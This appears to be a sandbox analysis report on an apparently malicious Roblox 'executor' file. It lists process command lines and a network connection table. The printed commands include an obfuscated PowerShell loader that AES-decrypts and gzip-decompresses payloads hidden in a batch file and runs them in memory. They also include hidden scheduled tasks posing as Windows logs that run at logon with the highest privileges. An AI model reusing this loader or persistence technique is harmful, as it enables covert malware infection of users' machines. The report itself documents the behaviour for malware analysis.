"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7612,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=9880 /prefetch:8
C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe
"C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe"
C:\Users\Admin\Desktop\Debug\gay ass executor.exe
"C:\Users\Admin\Desktop\Debug\gay ass executor.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=992,i,17063116522616061766,1418855832048689554,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=6788 /prefetch:8
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\WebView2RuntimeInstaller\MicrosoftEdgeWebview2Setup.exe
MicrosoftEdgeWebview2Setup.exe /silent /install
C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU8979.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.171.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswQzM3MTI3Mi1ERjYyLTQ1N0EtOTdENC01OTU4NTVFNEM5OER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE0My41NyIgbmV4dHZlcnNpb249IjEuMy4xNzEuMzkiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjYwMjg3ODIyMjgiIGluc3RhbGxfdGltZV9tcz0iNjkxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{1C82259F-B5B8-4CD9-8309-C6C77215F17D}" /silent
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0REMzQ0NEMy0yMDJFLTRENzMtQkYxQi01MjcxNjhBNjI3NkJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjUiIHN5c3RlbV91cHRpbWVfdGlja3M9IjYwMzI3MjIyODYiLz48L2FwcD48L3JlcXVlc3Q-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=128.0.6613.85 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=128.0.2739.42 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff682f306d8,0x7ff682f306e4,0x7ff682f306f0
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGQTYzNzI0OC0zMjAwLTQ3NDEtQkUyOC04RkU1NkFDRTJDMEJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMjguMC4yNzM5LjQyIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2MTE2MTAyMjMxIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-…-…-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe" -app -isInstallerLaunch -clientLaunchTimeEpochMs 0
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rawr.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Local\Temp\rawr.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_307_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_307.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_307.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_307.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Roaming\Windows_Log_307.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rawr.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Local\Temp\rawr.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_532_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_532.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_532.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_532.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Roaming\Windows_Log_532.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | file.io | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| PL | 108.138.51.120:443 | www.file.io | tcp |
| US | 8.8.8.8:53 | 24.107.55.45.in-addr.arpa | udp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| US | 8.8.8.8:53 | hb.vntsm.io | udp |
| US | 8.8.8.8:53 | hb-vntsm-com.global.ssl.fastly.net | udp |
| US | 172.67.36.131:443 | hb.vntsm.io | tcp |
| US | 151.101.129.194:443 | hb-vntsm-com.global.ssl.fastly.net | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | tcp |
| FR | 142.250.201.163:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | 174.20.217.172.in-addr.arpa | udp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | tcp |
| PL | 108.138.51.69:443 | cdn.exelator.com | tcp |
| PL | 108.138.46.40:443 | c.amazon-adsystem.com | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | udp |
| IE | 34.254.143.3:443 | mydmp.exelator.com | tcp |
| PL | 108.138.46.40:443 | c.amazon-adsystem.com | tcp |
| PL | 18.66.233.81:443 | config.aps.amazon-adsystem.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | tcp |
| US | 172.67.36.110:443 | cdn.hadronid.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 54.237.163.72:443 | onsite-tag-logs.apps.nielsen.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 69.51.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.143.254.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.46.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.233.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.36.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.174.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| NL | 63.215.202.178:443 | proc.ad.cpe.dotomi.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | udp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | udp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| US | 104.22.4.69:443 | id.hadron.ad.gt | tcp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| PL | 18.244.146.68:443 | tags.crwdcntrl.net | tcp |
| IE | 18.200.223.87:443 | s.cpx.to | tcp |
| US | 104.18.167.224:443 | pub.doubleverify.com | tcp |
| US | 172.64.152.89:443 | cdn-ima.33across.com | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| DE | 91.228.74.200:443 | pixel.quantserve.com | tcp |
| DE | 37.252.172.123:443 | ib.adnxs.com | tcp |
| US | 104.18.167.224:443 | pub.doubleverify.com | udp |
| GB | 18.245.187.38:443 | rules.quantcount.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
| US | 13.227.146.154:443 | aax.amazon-adsystem.com | tcp |
| IE | 52.51.104.112:443 | bcp.crwdcntrl.net | tcp |
| US | 34.120.111.33:443 | api.edkt.io | tcp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 69.166.1.64:443 | apex.go.sonobi.com | tcp |
